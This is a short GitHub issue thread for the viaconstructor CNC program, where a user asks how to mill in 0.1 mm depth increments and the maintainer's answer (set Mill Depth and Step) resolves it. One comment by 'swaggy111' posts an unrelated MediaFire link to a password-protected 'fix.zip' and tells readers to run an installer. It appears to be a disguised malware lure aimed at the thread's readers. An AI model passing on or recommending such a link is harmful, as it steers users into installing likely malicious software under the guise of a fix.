### ISSUE TITLE
A question about depth increment

### ISSUE THREAD

**Issue by inakrin** [multigcs/viaconstructor#12]
Amazing software, launched flawlessly! Thank you!
I'm new to cnc, and I can't resolve following: I wand the drill to go over the same shape with 0.1mm increment each time until the desired depth is achieved. 
So far tried different options, but couldn't achieve that. The drill goes full depth first then starts moving horizontally. Is it not implemented or I'm missing something?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by multigcs** [comment]
Mill -> Depth == desired depth
Mill -> Step ==  incremental (0.1mm)

that should work

**Comment by inakrin** [comment]
> Mill -> Depth == desired depth Mill -> Step == incremental (0.1mm)
> 
> that should work

Thank you! It worked
